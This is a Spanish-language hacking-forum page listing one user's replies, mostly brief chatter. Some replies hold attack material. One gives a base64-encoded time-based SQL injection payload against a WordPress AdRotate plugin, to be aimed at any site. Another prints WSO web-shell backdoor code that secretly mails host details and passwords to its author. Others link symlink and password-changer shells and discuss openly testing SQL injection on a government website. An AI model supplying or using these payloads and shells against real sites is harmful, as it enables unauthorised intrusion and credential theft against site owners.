Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.

Mensajes - TUNOVATO

Páginas: [1] 2
1
Bugs y Exploits / Re:Remote File Downloading (RFD) En MySQL
« en: Noviembre 05, 2013, 11:56:52 pm »
saludos compa;

 :o me has dejao  :o

sigue asi compa vas bien

2
Underc0de / Re:Reto Oficial #2 - El rey de la Colina - Anotate!
« en: Septiembre 21, 2013, 11:07:42 pm »
saludos,

aer me apunto si se puede aun  8)

3
Bugs y Exploits / Re:[JoomlaScan v1.4] Scanner de vulnerabilidades para Joomla
« en: Septiembre 11, 2013, 04:51:24 am »

Switch.pm  :o :o :o

vaya problemon para windows...



4
Manuales y libros / Re:Pedido de Libros - Manuales [Pedilo aca!]
« en: Septiembre 04, 2013, 03:57:22 am »
estoy en la busqueda de este libro:

Desarrollo Web con PHP 6, Apache y MySQL
Timothy Boronczyk, Elizabeth Naramore, Jason Gerner, Yann Le Scouarnec, Jeremy Stolz y Michael K. Glass


http://www.amazon.es/Desarrollo-Apache-MySQL-Anaya-Multimedia/dp/8441526222
http://www.abebooks.co.uk/Desarrollo-Web-PHP-6-Apache-MySQL/5404382118/bd


5
Dudas y pedidos generales / Re:Wordpress vulnerable sql
« en: Agosto 27, 2013, 03:18:23 am »
saludos compa;

haz lo siguiente:

Código: [Seleccionar]
http://www.site.com/wp-content/plugins/adrotate/adrotate-out.php?track=MScgQU5EIDE9SUYoMj4xLEJFTkNITUFSSyg1MDAwMDAwLE1ENShDSEFSKDExNSwxMTMsMTA4LDEwOSw5NywxMTIpKSksMCkj

http://www.AQUITUWEB.com/wp-content/plugins/adrotate/adrotate-out.php?track= <-- AQUI ESTO:
Código: [Seleccionar]
MScgQU5EIDE9SUYoMj4xLEJFTkNITUFSSyg1MDAwMDAwLE1ENShDSEFSKDExNSwxMTMsMTA4LDEwOSw5NywxMTIpKSksMCkj
ESTO:
Código: [Seleccionar]
MScgQU5EIDE9SUYoMj4xLEJFTkNITUFSSyg1MDAwMDAwLE1ENShDSEFSKDExNSwxMTMsMTA4LDEwOSw5NywxMTIpKSksMCkj
ES ESTO:
Código: [Seleccionar]
1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#

lo cual esta encodeado en based64


si no entendistes como funciona.....  vas a tener que leeerrr y mucho..... o mejor te dedicas a otras cosas...  :o


saludos;

6
Front-end / Re:El gran libro de HTML5, CSS3 y Javascript [MF]
« en: Agosto 21, 2013, 01:32:58 am »
Leyendo aer como esta...  8)

7
Bugs y Exploits / Re:Symlink en parte automatizado
« en: Agosto 09, 2013, 11:21:01 pm »
saludos,

para complementar tu post te agrego una version con Bypass name.conf


http://pastebin.com/YU8LiQJa


Nota: hay otras tool para auto symlink

8
Shells / Re:[PHP] WSO shell backdoor
« en: Julio 26, 2013, 11:37:31 pm »
Hay que enseñarles a ofuscar código a estos juakerz

Código: [Seleccionar]
$visitc = $_COOKIE["visits"];
if ($visitc == "") {
  $visitc  = 0;
  $visitor = $_SERVER["REMOTE_ADDR"];
  $web     = $_SERVER["HTTP_HOST"];
  $inj     = $_SERVER["REQUEST_URI"];
  $target  = rawurldecode($web.$inj);
  $judul   = "WSO 2.7 http://$target by $visitor";
  $body    = "Bug: $target by $visitor - $auth_pass";
  if (!empty($web)) { @mail("[email protected]",$judul,$body,$auth_pass); }
}
else { $visitc++; }
@setcookie("visitz",$visitc);

este es un descarado...... ----> [email protected]

 ;D ;D ;D ;D ;D

9
Bugs y Exploits / Re:Full Source Disclosure por SQLI
« en: Julio 26, 2013, 10:29:42 pm »
el clasico LOAD_FILE()   :o :o :o :o


aer cuando no puedes ver o provocar el error y ver el path o Document Root...!!!!


tambien tenes que aprovechar de explicar INTO OUTFILE para culminar el tuto...

pero ta bueno

10
Ok soy novato en este asunto pero puedo participar, me apunto....

11
Hacking ShowOff / Re:SQLI http://webhosting.redsalud.gov.cl/
« en: Junio 28, 2013, 11:23:58 pm »
Lo hago publico con la finalidad de darle una mano a la gente que quiere aprender y ver vectores reales y puedan probar o hacerse a la idea de distintas formas de hacer sqli, y el plus se lo doy ya que son webs del gobierno y llegado el momento que haga el tiempito, voy a empesar a reportar todo mientras tanto y mientras no se reparen los fallos pueden ir testeando, he publicado otras sqli con waf bypass, para justamente ayudar a otras personas a experimentar y ver otros vectores. Varios amigos han podido aplicar otros metodos como double error y otros metodos de filtrado de waf del los cuales tambien he aprendido cosas muy utiles al estudiar sus vectores, y asi tanto yo como la gente que quiera investigar un poco mas podemos hacer un reflujo de conocimiento, y pasarnos vectores personalizados y nuevos para ir aprendiendo.

Ademas le doy un poco mas de vida a la sección!

Saludos compa;

estoy totalmente de acuerdo con lo que dices; el compartir conocimientos e intercambiar ideas...!!!, haciendo asi que otro se interesen en el tema como los que se estaban realizando en los wargames donde se colocaban Retos con el fin meramente educativo... de escenarios reales...
para dejar volar la imaginacion y los conocimientos en cuanto a los diversos retos.., lo que si no comparto es la publicacion del vector... asi se pierde la magia, el encanto, no dejas que la curiosidad de como obtener el vector, y solo facilitas lameradas como me dijeron alguna vez con respecto a una web gubernamental...

12
Dudas y pedidos generales / Re:Duda con tipo de hash
« en: Junio 23, 2013, 04:12:28 pm »

d688e36a56abaacd19c9f0fd2ac32be88def71f2956ed0a2770b2f3830237588a4dad03af5f140c55fcbbba86e6fe727fda37103523385a6b9936cf7f974df8d

a mi tambien me da:
SHA512

 ;)

13
 :o muy bueno....!!!  :o

14
Wargames y retos / Re:[Medium/Hard]MySQL Injection Challenge.
« en: Junio 14, 2013, 04:35:52 am »

Esta dura la cosa, ahy que leer y buscar comodines...

Nota: gradecimientos al compa por su orientacion...

15
Seguridad Wireless / Re:Asegurando nuestra red wireless
« en: Junio 04, 2013, 11:56:17 pm »
es muy bueno compa;

16
Base de Datos / Re: Tutorial básico de bases de datos
« en: Junio 04, 2013, 11:20:39 pm »
En mis tiempos (cuando entraba a este foro) la gente tenia mas nivel y no publicaban cosas tan tan basicas, otra cosa en mis tiempos tambien a Mysql, PostgreSQL, etc... no se le llamaban bases de datos, se les llamaban SGBD...


jajajajaja ya empezo la elite a criticar....!!! los aportes de los demas...

o sera que nunca lo habian hecho tambien y se recuerdan de aquellos tiempos de n00bs cuan do publicaban republicaciones retraducidas del ingles al español para darselas de elite....


saludos;

nota: sin animo de ofender, el qque le pique que se rasque...!!!

17
Seguridad web y en servidores / Re:[ACLARACION] Tipos de servidores
« en: Mayo 28, 2013, 01:14:02 am »
 :o :o me voy enterando  :o :o

18
Zona Webmaster / Re:Tabla periodica del HTML
« en: Mayo 06, 2013, 11:05:34 pm »
 :o Interesante...!!!  :o

19
Bugs y Exploits / Re:Joomla! 3.0.3 Object Injection Vulnerability
« en: Mayo 05, 2013, 01:49:19 am »
Alguna pequeña explicacion de su uso?, funciona con todas las paginas que usan joomla o deben tener un plugin especifico para que la vulnerabilidad funcione?

si por favor....   :o :o :o

20
Dudas y pedidos generales / Re:problema con symlink
« en: Marzo 08, 2013, 01:03:20 am »
Hola man, mira para symlinik hay varias herramientas que te podrian simplificar el trabajo y que no sea tan aburrido xD
Aca te dejo 1 shell para hacer symlink:
http://pastebin.com/g0cHMUzL
Es tan simple como darle a Domain&Script y despues usar el wordpress password changer y el joomla password changer :D
Espero haberte ayudado...
SombrA
   


woowww

eres un capo wey....

Páginas: [1] 2